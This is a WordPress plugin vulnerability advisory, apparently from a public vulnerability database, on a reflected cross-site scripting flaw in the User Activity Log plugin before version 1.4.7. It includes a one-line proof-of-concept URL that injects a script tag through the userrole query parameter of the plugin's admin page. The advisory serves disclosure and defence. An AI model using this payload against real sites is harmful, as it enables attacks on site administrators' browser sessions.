WordPress Plugin Vulnerabilities
User Activity Log < 1.4.7 - Reflected Cross Site Scripting via Query String
Description
The plugin does not escape the $_SERVER['QUERY_STRING'] before outputting it back in attributes, which could lead to Reflected Cross-Site Scripting in web browsers which do not encode URL characters.
Proof of Concept
With a web browser which does not encode characters (or use burp suite and decode the URL via the repeater) https://example.com/wp-admin/admin.php?page=user_action_log&paged=1&userrole=Administrator"><script>alert(/XSS/)</script>&username=&type=&txtsearch=
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
swapnil subhash bodekar
Submitter
swapnil subhash bodekar
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-30 (about 2 years ago)
Added
2021-08-30 (about 2 years ago)
Last Updated
2021-08-30 (about 2 years ago)